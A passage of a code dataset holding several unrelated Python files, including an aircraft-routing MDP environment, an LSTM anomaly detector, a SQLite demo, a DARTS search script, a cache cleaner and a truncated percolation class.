genAbstract.summarize(content, title)\n return jsonify({'status': 'OK', 'text': text});\n\n","repo_name":"HemingPang/GenAbstract","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":749,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"36770654407","text":"import streamlit as st\nimport numpy as np\nimport pickle\nfrom explore_page import compute_cost, compute_gradient, gradient_descent\n\n# Load the pickled model\ndef load_model():\n with open('saved_steps.pkl', 'rb') as file:\n data = pickle.load(file)\n return data\n\ndata = load_model()\n\npredicted_loaded = data[\"model\"]\npopulation = data[\"Population\"]\n\n\n\n\n\n\ndef show_predict_page():\n st.title(\"Restaurant Profit Prediction App\")\n\n #population = st.slider(\"Population\", 0, 100, 50) \n population = st.number_input(\"type in the population\", 0, 100, 50)\n x_train = data['Population']\n # y_train = data['Profit']\n #initial_w = 0\n #initial_b = 0\n\n # some gradient descent values\n #iterations = 150\n #alpha = 0.01\n\n\n #w,b,_,_ = gradient_descent(x_train, y_train, initial_w, initial_b, compute_cost,\n # compute_gradient, alpha, iterations)\n w = 1.17\n b = -3.63\n\n ok = st.button(\"Predict Profit\")\n if ok:\n m = x_train.shape[0]\n predicted = np.zeros(m)\n for i in range(m):\n predicted[i] = w * x_train[i] + b\n\n profit = population * w +b \n st.subheader(f\"The profit of the restaurant is ${profit*10000:.2f} dollars\")\n #st.success(f\"The profit of the restaurant is {profit:.2f} dollars\")\n #st.write(\"The predicted profit is\", predicted)\n #predict_1 = 3.5 * w + b\n","repo_name":"RaphSmart/Restaurant-profit-prediction","sub_path":"predict_page.py","file_name":"predict_page.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30161517997","text":"\"\"\"\r\n\n\n **Nesting level** , in this challenge, refers to the depth of parentheses\naround an integer. 
For example, in the string `\"(5((10)8))\"`, 5 has a nesting\nlevel of 1 because it has one set of parentheses around it, 10 has a nesting\nlevel of 3 because it has 3 sets of parentheses around it, and 8 has a nesting\nlevel of 2.\n\nWe can score this string by multiplying each number times its nesting level\nand then summing the results:\n\n \"(5((10)8))\" ➞ 5*1 + 10*3 + 8*2 ➞ 51\n\nCreate a function that takes a string as its argument and returns its score.\n\n### Examples\n\n score_it(\"()\") ➞ 0\n \n score_it(\"4(123)\") ➞ 123\n # 4*0 + 123*1 = 123\n \n score_it(\"((((1)2)3)4)\") ➞ 20\n # 1*4 + 2*3 + 3*2 + 4*1 = 20\n \n score_it(\"(6)8((34(7)))\") ➞ 95\n # 6*1 + 8*0 + 34*2 + 7*3 = 95\n\n### Notes\n\n * The nesting for all test cases is balanced and logically consistent (there are no missing or extra parentheses).\n * Test cases contain only positive integers.\n\n\"\"\"\r\n\nimport re\ndef score_it(s):\n score = 0\n s = re.sub(r'[^\\d()]', '', s)\n for match in re.finditer(r'\\d+', s):\n num = int(s[match.start():match.end()])\n depth = sum([1 if c == '(' else -1 if c == ')' else 0 for c in s[:match.start()]])\n score += num * depth\n return score\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"zp64GNJQpZyGpYWL8_8.py","file_name":"zp64GNJQpZyGpYWL8_8.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"6533838528","text":"class Solution:\n def reverseString(self, s: List[str]) -> None:\n \"\"\"\n Do not return anything, modify s in-place instead.\n\n time: O(n)\n space: O(1)\n \"\"\"\n n = len(s)\n for l in range(n // 2):\n r = (n - 1) - l\n # swap\n s[l], s[r] = s[r], s[l]\n\n","repo_name":"meowpunch/meowrithm","sub_path":"python/leetcode/Reverse String.py","file_name":"Reverse String.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"10986331913","text":"\"\"\"\nA classic Aircraft routing problem described in Nilm 2005.\n\"\"\"\n\nimport logging\nimport sys\nimport random\nimport os\n\nimport numpy as np\nimport pickle\nfrom gym import utils\nfrom gym.envs.toy_text import discrete\n\nfrom math import factorial\nimport matplotlib.pyplot as plt\nimport math\nfrom .common import render_state\n\nlogger = logging.getLogger(__name__)\n\n# Action\nLEFT = 0\nDOWN = 1\nRIGHT = 2\nUP = 3\n\nclass ExpRoutingRandom(discrete.DiscreteEnv):\n \"\"\"\n The aircraft must go through a stormy area.\n\n The space is a N x N grid.\n\n Denote A as the aircraft, E as the end point.\n\n X\n X\n A X E\n X\n X\n\n Here Xs are a stormy area that has some chance of storm.\n\n For simplicity, we place A at the middle of very left.\n E at the middle of very right.\n\n The storm follow a transition matrix of 2^k * 2^k.\n Each entry is the probability transit from one possible state to the other.\n\n Assume k obstacle.\n \"\"\"\n metadata = {\n 'render.modes': ['human', 'rgb_array'],\n 'video.frames_per_second': 50\n }\n\n def __init__(self, desc=None):\n pass\n\n def set(self, config):\n GRID_SIZE = config.grid_size\n K = config.k\n assert 2 * K + 1 <= GRID_SIZE\n RUN_ID = config.run_id # Generate and store on a differently generated randomness under the same setting\n MAP_FILE = 'random_store/GS_%d_K_%d_RUN_%d.npy' % (GRID_SIZE, K, RUN_ID)\n AREA_UP_BOUND = math.ceil(GRID_SIZE * GRID_SIZE / float(K))\n\n # Q Single\n Q_SINGLE_G2G = config.g2g\n Q_SINGLE_G2B = 1. 
- Q_SINGLE_G2G\n Q_SINGLE_B2B = config.b2b\n Q_SINGLE_B2G = 1. - Q_SINGLE_B2B\n # P Perturbation\n E = config.epsilon # always added to 2B and decreased to 2G\n P_SINGLE_G2G = Q_SINGLE_G2G - E\n P_SINGLE_G2B = 1. - P_SINGLE_G2G\n P_SINGLE_B2B = Q_SINGLE_B2B + E\n P_SINGLE_B2G = 1. - P_SINGLE_B2B\n\n # Cost\n COST_NORMAL = 1.\n COST_STORM = config.cost_storm\n\n if os.path.isfile(MAP_FILE):\n each_storm_map_bbox = np.load(MAP_FILE)\n else:\n each_storm_map_bbox = np.zeros((K, 4), dtype=int) # storm areas can overlap\n for j in range(K):\n area = np.inf\n while area > AREA_UP_BOUND or area <= 0:\n bbox_left = np.random.randint(0, GRID_SIZE - 1)\n bbox_right = np.random.randint(0, GRID_SIZE - 1)\n bbox_left, bbox_right = min(bbox_left, bbox_right), max(bbox_left, bbox_right)\n bbox_top = np.random.randint(0, GRID_SIZE - 1)\n bbox_bottom = np.random.randint(0, GRID_SIZE - 1)\n bbox_top, bbox_bottom = min(bbox_top, bbox_bottom), max(bbox_top, bbox_right)\n area = (bbox_bottom - bbox_top) * (bbox_right - bbox_left)\n each_storm_map_bbox[j] = np.array([bbox_left, bbox_right, bbox_top, bbox_bottom])\n np.save(MAP_FILE, each_storm_map_bbox)\n\n self.nrow, self.ncol = nrow, ncol = (GRID_SIZE, GRID_SIZE)\n\n k = K\n tk = 2**k\n nS = nrow * ncol * tk\n nA = 4\n\n # Get the binary: 12 -> 01100 -> [False, True, True, False, False], suppose K is 5\n fs = '{0:0' + str(K) + 'b}'\n\n def stormID2BoolList(id):\n return [int(x) > 0 for x in fs.format(id)]\n\n # calc distribution probability, treat p to be the probability of flip, 1-p fr hold\n def calcTransProb(count_G2G, count_G2B, count_B2G, count_B2B, prob_G2G, prob_G2B, prob_B2G, prob_B2B):\n return (prob_G2G ** count_G2G) * (prob_G2B ** count_G2B) * (prob_B2G ** count_B2G) * (prob_B2B ** count_B2B)\n\n # (row, col, storm_index) to stateID\n def to_s(row, col, storm_index):\n return nrow * ncol * storm_index + row * ncol + col\n\n # step\n def inc(row, col, a):\n if a == 0: # left\n col = max(col - 1, 0)\n elif a == 1: # down\n row = min(row + 1, nrow - 1)\n elif a == 2: # right\n col = min(col + 1, ncol - 1)\n elif a == 3: # up\n row = max(row - 1, 0)\n return (row, col)\n\n terminal_pos = (nrow // 2, ncol - 1)\n\n # obtain_storm_maps\n storm_maps = np.zeros((tk, nrow, ncol)).astype('float64')\n for i in range(tk):\n bool_list = stormID2BoolList(i)\n for j in range(len(bool_list)):\n if bool_list[j]: # j-th storm is on\n storm_maps[i,\n each_storm_map_bbox[j][2]:each_storm_map_bbox[j][3],\n each_storm_map_bbox[j][0]:each_storm_map_bbox[j][1]\n ] = 1.\n\n # Conventions: Q is the nominal distribution and P is the perturbed one\n # Define Qs: only care about the transformation between storms\n # Define Ps: only care about the transformation between storms\n Qs = np.zeros((tk, tk), np.float32)\n Ps = np.zeros((tk, tk), np.float32)\n for i in range(tk):\n bool_list_i = stormID2BoolList(i)\n for j in range(tk):\n bool_list_j = stormID2BoolList(j)\n count_G2G = sum([not bool_list_i[z] and not bool_list_j[z] for z in range(k)])\n count_G2B = sum([not bool_list_i[z] and bool_list_j[z] for z in range(k)])\n count_B2G = sum([bool_list_i[z] and not bool_list_j[z] for z in range(k)])\n count_B2B = sum([bool_list_i[z] and bool_list_j[z] for z in range(k)])\n Qs[i, j] = calcTransProb(count_G2G, count_G2B, count_B2G, count_B2B,\n Q_SINGLE_G2G, Q_SINGLE_G2B, Q_SINGLE_B2G, Q_SINGLE_B2B)\n Ps[i, j] = calcTransProb(count_G2G, count_G2B, count_B2G, count_B2B,\n P_SINGLE_G2G, P_SINGLE_G2B, P_SINGLE_B2G, P_SINGLE_B2B)\n\n # Put Ps into P, Qs into Q:\n Q = {s: {a: [] for a in 
range(nA)} for s in range(nS)}\n P = {s: {a: [] for a in range(nA)} for s in range(nS)}\n Qmatrix = np.zeros((nS, nA, nS), dtype=np.float64)\n Pmatrix = np.zeros((nS, nA, nS), dtype=np.float64)\n for row in range(nrow):\n for col in range(ncol):\n for old_storm_id in range(tk):\n old_state_id = to_s(row, col, old_storm_id)\n # Note: cost is irrelavant to the new state!\n if storm_maps[old_storm_id, row, col] == 1:\n cost = COST_STORM\n else:\n cost = COST_NORMAL\n for new_storm_id in range(tk):\n for a in range(4):\n newrow, newcol = inc(row, col, a)\n new_state_id = to_s(newrow, newcol, new_storm_id)\n done1 = (row, col) == terminal_pos\n done2 = (newrow, newcol) == terminal_pos\n P[old_state_id][a].append(\n (Ps[old_storm_id, new_storm_id], new_state_id,\n cost, done1 or done2))\n Pmatrix[old_state_id, a, new_state_id] = Ps[\n old_storm_id][new_storm_id]\n Q[old_state_id][a].append(\n (Qs[old_storm_id, new_storm_id], new_state_id,\n cost, done1 or done2))\n Qmatrix[old_state_id, a, new_state_id] = Qs[\n old_storm_id][new_storm_id]\n\n # Take home\n self.storm_maps = storm_maps\n self.Qs = Qs\n self.Q = Q\n self.Qmatrix = Qmatrix\n self.Ps = Ps\n self.P = P\n self.Pmatrix = Pmatrix\n\n self.k = k\n self.nrow = nrow\n self.ncol = ncol\n self.terminal_pos = terminal_pos\n self.nS = nS\n self.nA = nA\n self.tk = tk\n\n # new object\n isd = np.zeros((tk, nrow, ncol)).astype('float64')\n isd[0, nrow // 2, 0] = 1\n super(ExpRoutingRandom, self).__init__(nS, nA, P, isd)\n\n def reset(self, seed=None):\n random.seed(seed)\n np.random.seed(seed)\n return super(ExpRoutingRandom, self).reset()\n\n def render(self, random='human', close=False):\n render_state(self.s, self.nrow, self.ncol, self.storm_maps, self.terminal_pos)\n","repo_name":"ByzanTine/RobustMDP","sub_path":"nominal-mdp/test_env/envs/exp_routing_random.py","file_name":"exp_routing_random.py","file_ext":"py","file_size_in_byte":8551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29408022194","text":"import sys\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.preprocessing import MinMaxScaler\nfrom keras.models import Sequential, load_model\nfrom keras.layers import Dense, LSTM, Dropout, RepeatVector, TimeDistributed\nfrom datetime import timedelta\nfrom data_import import read_dataset\n\n\ndef create_train_set(ts, training_ratio, lookback):\n training_size = int(training_ratio * ts.shape[0])\n train_ts = ts[:training_size]\n\n x = train_ts[['value']]\n y = train_ts['value']\n\n x_train = []\n y_train = []\n\n for i in range(len(x) - lookback):\n v = x.iloc[i:(i + lookback)].values\n x_train.append(v)\n y_train.append(y.iloc[i + lookback])\n\n return x_train, y_train\n\n\ndef create_test_set(ts, training_ratio, lookback):\n training_size = int(training_ratio * ts.shape[0])\n test_ts = ts[training_size - lookback:]\n\n x = test_ts[['value']]\n y = test_ts['value']\n\n x_test = []\n y_test = []\n\n for i in range(len(x) - lookback):\n v = x.iloc[i:(i + lookback)].values\n x_test.append(v)\n y_test.append(y.iloc[i + lookback])\n\n return np.array(x_test)\n\n\ndef create_forecast_set(ts, lookback):\n forecast_ts = ts.copy()\n\n x = forecast_ts[['value']]\n y = forecast_ts['value']\n\n x_forecast = []\n for i in range(len(x) - lookback):\n v = x.iloc[i:(i + lookback)].values\n x_forecast.append(v)\n\n return np.array(x_forecast)\n\n\ndef train(all_ts, training_ratio, lookback, saved_model_name=None):\n scaler = MinMaxScaler(feature_range=(0, 
1))\n all_ts_df = pd.DataFrame(all_ts[0])\n\n for series in all_ts[1:]:\n all_ts_df = all_ts_df.append(series)\n\n scaler.fit(all_ts_df)\n\n x_train = []\n y_train = []\n\n for series in all_ts:\n scaled_ts = series.copy()\n scaled_ts['value'] = scaler.transform(scaled_ts[['value']])\n train_set = create_train_set(scaled_ts, training_ratio, lookback)\n\n x_train += train_set[0]\n y_train += train_set[1]\n\n x_train = np.array(x_train)\n y_train = np.array(y_train)\n\n model = Sequential()\n model.add(LSTM(units=64, input_shape=(x_train.shape[1], x_train.shape[2])))\n model.add(Dropout(rate=0.2))\n\n model.add(RepeatVector(n=x_train.shape[1]))\n model.add(LSTM(units=64, return_sequences=True))\n model.add(Dropout(rate=0.2))\n\n model.add(TimeDistributed(Dense(x_train.shape[2])))\n model.compile(optimizer='adam', loss='mae')\n\n model.fit(x_train, y_train, epochs=4, batch_size=64, validation_split=0.1, shuffle=False)\n\n if saved_model_name is not None:\n model.save('models/detect/' + saved_model_name)\n\n return model\n\n\ndef test_forecast(ts, model, lookback, threshold, training_ratio=None):\n scaler = MinMaxScaler()\n test_ts = ts.copy()\n test_ts['value'] = scaler.fit_transform(test_ts[['value']])\n\n if training_ratio is not None:\n x_test = create_test_set(test_ts, training_ratio, lookback)\n training_size = int(training_ratio * ts.shape[0])\n test_ts = test_ts[training_size - lookback:]\n else:\n x_test = create_forecast_set(test_ts, lookback)\n\n # threshold = scaler.transform([[threshold]])[0][0]\n\n x_test_pred = model.predict(x_test)\n test_mae_loss = np.mean(np.abs(x_test_pred - x_test), axis=1)\n\n test_score_df = pd.DataFrame(index=test_ts[lookback:].index)\n test_score_df['loss'] = test_mae_loss\n test_score_df['threshold'] = threshold\n test_score_df['anomaly'] = test_score_df.loss > test_score_df.threshold\n test_score_df['value'] = test_ts[lookback:].value\n\n plt.figure(figsize=(16, 8))\n plt.grid()\n plt.title('Error')\n plt.plot(test_score_df.index, test_score_df.loss, label='loss')\n plt.plot(test_score_df.index, test_score_df.threshold, label='threshold')\n plt.xticks(rotation=25)\n plt.legend()\n\n anomalies = test_score_df[test_score_df.anomaly == True]\n anomalies.reindex()\n\n corrected_dates = []\n\n # sync anomalies points with the correct time series points\n for date in anomalies.index:\n day_before = (date - timedelta(days=2)).date()\n corrected_dates.append(day_before)\n anomalies.loc[date, 'value'] = test_ts.loc[str(day_before), 'value']\n\n anomalies.index = corrected_dates\n\n plt.figure(figsize=(16, 8))\n plt.grid()\n plt.title('Anomalies')\n plt.plot(test_ts['value'], zorder=1)\n plt.scatter(anomalies.index, anomalies['value'], color='red', linewidths=1, zorder=2)\n plt.show()\n\n\nif __name__ == '__main__':\n dataset = 'datasets/nasdaq2007_17.csv'\n n = 400\n mae_threshold = 0.15\n save_model = False\n pretrained_model = None # 'models/detect/model1'\n\n # read command line arguments\n for i, arg in enumerate(sys.argv):\n if arg == '-model':\n pretrained_model = sys.argv[i + 1]\n if arg == '-n':\n n = int(sys.argv[i + 1])\n if arg == '-d':\n dataset = sys.argv[i + 1]\n if arg == '-save_model':\n save_model = True\n if arg == '-mae':\n mae_threshold = float(sys.argv[i + 1])\n\n try:\n all_ts, _ = read_dataset(dataset, n)\n except:\n print('Error in reading dataset!')\n exit()\n\n training_ratio = 0.7\n lookback = 200\n\n # use pretrained model\n if pretrained_model is not None:\n try:\n model = load_model(pretrained_model)\n except:\n print('Error in 
loading pretrained model!')\n exit()\n # train and test model\n else:\n try:\n if save_model:\n model_name = input(\"Saved Model Name: \")\n model = train(all_ts, training_ratio, lookback, model_name)\n else:\n model = train(all_ts, training_ratio, lookback)\n except:\n print('Error while training model!')\n try:\n if pretrained_model is not None:\n for ts in all_ts:\n test_forecast(ts, model, lookback, mae_threshold)\n else:\n for ts in all_ts:\n test_forecast(ts, model, lookback, mae_threshold, training_ratio)\n except:\n print('Error while making forecasts')\n exit()\n","repo_name":"Kosmai/LSH_kNN_Clustering","sub_path":"Time_Series_Analysis/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":6179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"36413815238","text":"import sqlite3\n\nconnect_db = sqlite3.connect(\"MyDatabase.sql3\")\n\n# could be created several cursors for parallel processing\ncursor = connect_db.cursor()\n\n# drop table if it exists\ncursor.execute(\"DROP TABLE IF EXISTS publisher\")\n\n# create a new table\ncursor.execute(\"\"\"CREATE TABLE publisher(\n pubid INT PRIMARY KEY,\n pubname VARCHAR(25),\n puburl VARCHAR(125))\"\"\")\n\n#drop table if it exists\ncursor.execute(\"DROP TABLE IF EXISTS book\")\n\n# create a new table\ncursor.execute(\"\"\"\\\n CREATE TABLE book (\n bkisbn CHAR(10) PRIMARY KEY,\n bktitle VARCHAR(60),\n bkyear INT,\n bkpubid INT,\n FOREIGN KEY(bkpubid) REFERENCES publisher(pubid))\n \"\"\")\n\n# create a simple list of publishers\nbook_tuple = (\n (\"Holden Web\", \"http://holdenweb.com\"),\n (\"Apress\", \"http://apress.com\"),\n (\"O`Reilly Media\", \"http://oreilly.com\"),\n (\"Packt Publisher\", \"http:///www.packtpub.com\")\n)\nbook_dict = {\n \"1565926218\": (\"Python Programming on Win32\", 1999, 2),\n \"1590597257\": (\"The Definitive Guide to Django\", 2011, 1),\n \"1234567890\": (\"No book You ever heard of\", 2015, 0),\n \"0569007973\": (\"The Python Cookbook\", 2009, 2),\n \"7818471947\": (\"Expert Python Programming\", 2012, 3)\n}\n\nISBN = \"1234567890\"\nbook = book_dict[ISBN]\npublisher = book_tuple[book[2]]\nprint(\"\"\"\\\nISBN {}\nTitle: {}\nYear: {}\nPublisher: {}\nURL: {}\"\"\".format(ISBN, book[0], book[1], publisher[0], publisher[1]))\n\n# insert data to the database\nfor i, publisher in enumerate(book_tuple):\n cursor.execute(\"\"\"\n INSERT INTO publisher (pubid, pubname, puburl)\n VALUES(?, ?, ?)\"\"\", (i, publisher[0], publisher[1]))\n\n# select all columns from te publisher table\ncursor.execute(\"SELECT * FROM publisher\")\ncursor.fetchall()\n\nfor ISBN, (title, year, pubid) in book_dict.items():\n cursor.execute(\"\"\"\n INSERT INTO book\n (bkisbn, bktitle, bkyear, bkpubid)\n VALUES (?, ?, ?, ?)\"\"\", (ISBN, title, year, pubid))\n\ncursor.execute(\"SELECT * FROM book\")\ncursor.fetchall()\n\n# retrieve a join of two tables\ncursor.execute(\"\"\"SELECT * FROM book JOIN publisher ON pubid=bkpubid\"\"\")\ncursor.fetchall()\n\nconnect_db.commit()\nconnect_db.close()\n","repo_name":"sergeyMelentyev/Python_Prime","sub_path":"SQLite_API.py","file_name":"SQLite_API.py","file_ext":"py","file_size_in_byte":2321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"32805352395","text":"import pdb\nimport argparse\nimport yaml\nimport os\nimport time\nimport sys\nimport numpy as np\nimport pipeline\nfrom helper import calc_param_size, print_red, ReduceLROnPlateau\nfrom .nas import 
ShellNet\n# from tqdm import tqdm\nfrom tqdm.notebook import tqdm\nfrom collections import defaultdict, Counter, OrderedDict\nimport pickle\nfrom paddle.fluid import core\nimport paddle.fluid as fluid\nfrom paddle.fluid.optimizer import Adam\nfrom paddle.fluid.layers import accuracy\nfrom .utils import load_opt\n\n\nDEBUG_FLAG = False\n\nclass Base:\n '''\n Base class for Searching and Training\n cf: config.yml path\n cv_i: Which fold in the cross validation. If cv_i >= n_fold: use all the training dataset.\n for_train: If True, for training process, otherwise for searching.\n '''\n def __init__(self, cf='config.yml', cv_i=0, for_train=False):\n self.cf = cf\n self.cv_i = cv_i\n self.for_train = for_train\n self._init_config()\n self._init_log()\n self._init_device()\n self._init_dataset()\n \n def _init_config(self):\n with open(self.cf) as f:\n self.config = yaml.load(f, Loader=yaml.FullLoader)\n return\n \n def _init_log(self):\n self.log_path = self.config['data']['log_path']['pp']\n try:\n os.mkdir(self.log_path)\n except FileExistsError:\n pass\n\n def _init_device(self):\n seed = self.config['data']['seed']\n np.random.seed(seed)\n if not core.is_compiled_with_cuda():\n print_red('PaddlePaddle for CPU!')\n return\n \n def _init_dataset(self):\n dataset = pipeline.Dataset(cf=self.cf, cv_i=self.cv_i, for_train=self.for_train)\n self.train_generator = dataset.train_generator\n self.val_generator = dataset.val_generator\n return\n\nclass Searching(Base):\n '''\n Searching process\n cf: config.yml path\n cv_i: Which fold in the cross validation. If cv_i >= n_fold: use all the training dataset.\n new_lr: if True, check_resume() will not load the saved states of optimizers and lr_schedulers.\n '''\n def __init__(self, cf='config.yml', cv_i=0, new_lr=False):\n super().__init__(cf=cf, cv_i=cv_i)\n self._init_model()\n self.check_resume(new_lr=new_lr)\n \n def _init_model(self):\n self.model = ShellNet(in_channels=self.config['data']['in_channels'], \n init_node_c=self.config['search']['init_node_c'], \n out_channels=self.config['data']['out_channels'], \n depth=self.config['search']['depth'], \n n_nodes=self.config['search']['n_nodes'])\n print('Param size = {:.3f} MB'.format(calc_param_size(self.model.parameters())))\n self.loss = lambda props, y_truth: fluid.layers.reduce_mean(fluid.layers.softmax_with_cross_entropy(props, y_truth))\n self.optim_shell = Adam(parameter_list=self.model.alphas()) \n self.optim_kernel = Adam(parameter_list=self.model.kernel.parameters())\n self.shell_scheduler = ReduceLROnPlateau(self.optim_shell)\n self.kernel_scheduler = ReduceLROnPlateau(self.optim_kernel)\n\n def check_resume(self, new_lr=False):\n self.last_save = os.path.join(self.log_path, self.config['search']['last_save'])\n self.last_aux = os.path.join(self.log_path, self.config['search']['last_aux'])\n if os.path.exists(self.last_aux):\n self.model.set_dict(fluid.dygraph.load_dygraph(self.last_save)[0])\n with open(self.last_aux, 'rb') as f:\n state_dicts = pickle.load(f)\n self.epoch = state_dicts['epoch'] + 1\n self.geno_count = state_dicts['geno_count']\n self.history = state_dicts['history']\n if not new_lr:\n self.optim_shell.set_dict(load_opt(self.last_save+'_shell.pdopt'))\n self.optim_kernel.set_dict(load_opt(self.last_save+'_kernel.pdopt'))\n self.shell_scheduler.load_state_dict(state_dicts['shell_scheduler'])\n self.kernel_scheduler.load_state_dict(state_dicts['kernel_scheduler'])\n else:\n self.epoch = 0\n self.geno_count = Counter()\n self.history = defaultdict(list)\n\n def 
search(self):\n '''\n Return the best genotype in tuple:\n (best_gene: str(Genotype), geno_count: int)\n '''\n# pdb.set_trace()\n geno_file = os.path.join(self.log_path, self.config['search']['geno_file'])\n if os.path.exists(geno_file):\n print('{} exists.'.format(geno_file))\n with open(geno_file, 'rb') as f:\n return pickle.load(f)\n\n best_gene = None\n best_geno_count = self.config['search']['best_geno_count']\n n_epochs = self.config['search']['epochs']\n for epoch in range(n_epochs):\n gene = str(self.model.get_gene())\n self.geno_count[gene] += 1\n if self.geno_count[gene] >= best_geno_count:\n print('>= best_geno_count: ({})'.format(best_geno_count))\n best_gene = (gene, best_geno_count)\n break\n\n shell_loss, kernel_loss, shell_acc, kernel_acc = self.train()\n \n self.shell_scheduler.step(shell_loss)\n self.kernel_scheduler.step(kernel_loss)\n self.history['shell_loss'].append(shell_loss)\n self.history['kernel_loss'].append(kernel_loss)\n self.history['shell_acc'].append(shell_acc)\n self.history['kernel_acc'].append(kernel_acc)\n \n \n # Save what the current epoch ends up with.\n fluid.save_dygraph(self.model.state_dict(), self.last_save)\n fluid.save_dygraph(self.optim_shell.state_dict(), self.last_save+'_shell')\n fluid.save_dygraph(self.optim_kernel.state_dict(), self.last_save+'_kernel')\n state_dicts = {\n 'epoch': self.epoch,\n 'geno_count': self.geno_count,\n 'history': self.history,\n 'kernel_scheduler': self.kernel_scheduler.state_dict(),\n 'shell_scheduler': self.kernel_scheduler.state_dict(),\n }\n with open(self.last_aux, 'wb') as f:\n pickle.dump(state_dicts, f)\n \n self.epoch += 1\n if self.epoch > n_epochs:\n break\n \n if DEBUG_FLAG and epoch >= 3:\n break\n \n if best_gene is None:\n gene = str(self.model.get_gene())\n self.geno_count[gene] += 1\n best_gene = (gene, self.geno_count[gene])\n with open(geno_file, 'wb') as f:\n pickle.dump(best_gene, f)\n return best_gene\n \n \n def train(self):\n '''\n Searching | Training process\n To do optim_shell.step() and optim_kernel.step() alternately.\n '''\n self.model.train()\n train_epoch = self.train_generator.epoch()\n val_epoch = self.val_generator.epoch()\n n_steps = self.train_generator.steps_per_epoch\n sum_loss = 0\n sum_val_loss = 0\n sum_acc = 0\n sum_val_acc = 0\n with tqdm(train_epoch, total = n_steps,\n desc = 'Searching | Epoch {}'.format(self.epoch)) as pbar:\n for step, (x, y_truth) in enumerate(pbar):\n x = fluid.dygraph.to_variable(x.astype('float32'))\n y_truth = fluid.dygraph.to_variable(y_truth.astype('int64')[:,np.newaxis])\n try:\n val_x, val_y_truth = next(val_epoch)\n except StopIteration:\n val_epoch = self.val_generator.epoch()\n val_x, val_y_truth = next(val_epoch)\n val_x = fluid.dygraph.to_variable(val_x.astype('float32'))\n val_y_truth = fluid.dygraph.to_variable(val_y_truth.astype('int64')[:,np.newaxis])\n \n # optim_shell\n val_y_pred = self.model(val_x)\n val_loss = self.loss(val_y_pred, val_y_truth)\n sum_val_loss += val_loss.numpy()[0]\n val_acc = fluid.layers.accuracy(val_y_pred, val_y_truth, k=1)\n sum_val_acc += val_acc.numpy()[0]\n val_loss.backward()\n self.optim_shell.minimize(val_loss)\n self.optim_shell.clear_gradients()\n \n # optim_kernel\n y_pred = self.model(x)\n loss = self.loss(y_pred, y_truth)\n sum_loss += loss.numpy()[0]\n acc = fluid.layers.accuracy(y_pred, y_truth, k=1)\n sum_acc += acc.numpy()[0]\n loss.backward()\n self.optim_kernel.minimize(loss)\n self.optim_kernel.clear_gradients()\n \n # postfix for progress bar\n postfix = OrderedDict()\n 
postfix['Loss(optim_shell)'] = round(sum_val_loss/(step+1), 3)\n postfix['Acc(optim_shell)'] = round(sum_val_acc/(step+1), 3)\n postfix['Loss(optim_kernel)'] = round(sum_loss/(step+1), 3)\n postfix['Acc(optim_kernel)'] = round(sum_acc/(step+1), 3)\n pbar.set_postfix(postfix)\n \n if DEBUG_FLAG and step > 1:\n break\n \n return [round(i/n_steps,3) for i in [sum_val_loss, sum_loss, sum_val_acc, sum_acc]]\n \n \n \nif __name__ == '__main__':\n with fluid.dygraph.guard():\n s = Searching()\n gene = s.search()","repo_name":"woodywff/darts_pt_pp_tf","sub_path":"darts_pp/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":9639,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"23607620829","text":"# Import necessary modules\r\nimport os\r\nimport shutil\r\n\r\n\r\n# Function to collect cache\r\ndef collect_cache(folder_path):\r\n # Get the list of files and folders in the specified folder\r\n items_for_cache = os.listdir(folder_path)\r\n\r\n # Iterate over each item\r\n for item in items_for_cache:\r\n item_path = os.path.join(folder_path, item)\r\n\r\n if os.path.isfile(item_path):\r\n # If it's a file, remove it\r\n os.remove(item_path)\r\n elif os.path.isdir(item_path):\r\n # If it's a subfolder, recursively call collect_cache\r\n collect_cache(item_path)\r\n\r\n # Remove the empty folder after cleaning the cache\r\n os.rmdir(folder_path)\r\n\r\n\r\n# Example for usage\r\ncache_folder = \"/path/to/cache/folder\"\r\ncollect_cache(cache_folder)\r\n","repo_name":"shahzaibkhan2/Python-Advanced-Projects","sub_path":"code-for-collecting-and-cleaning-cache/collect_clean_cache.py","file_name":"collect_clean_cache.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"15091653795","text":"import os, sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__))))\n\nimport random\nfrom weighted_quick_union import UnionFind\n\nclass Percolation:\n \"\"\"Simulate Percolation to observe state change\"\"\"\n def __init__(self, side):\n self.side = side\n\n ## the first and last elements of list are vitual top and virtual bottom\n ## accessing any element from the list would be \n ## ( side * (row-1) + col )\n self.uf = UnionFind(side**2 + 2)\n\n self.track_open = [False for i in range(side**2 + 2)]\n self.track_open[:side+1] = [True for i in range(side+1)]\n self.track_open[side*(side-1)+1:] = [True for i in range(side+1)]\n self.open_sites = 0\n\n ## Opening and connecting virtual sites\n for i in range(1,6):\n ## connect top row to virtual top\n self.uf.union(0,i)\n ## connect bottom row to virtual bottom\n self.uf.union(side**2 + 1, side * (side-1) + i)\n\n\n def isOpen(self, row, col):\n return self.track_open[self.getBlockNumber(row, col)] == True\n\n def open(self, row, col):\n ## for 8 x 8 land; side = 8\n ## row = 3, col = 4; \n ## block no = 20\n ## neighbours = 19, 21, 28, 12\n if self.isOpen(row, col):\n return\n\n block_number = self.getBlockNumber(row, col)\n\n neighbours = [\n (row, col + 1), ## right\n (row, col - 1), ## left\n (row - 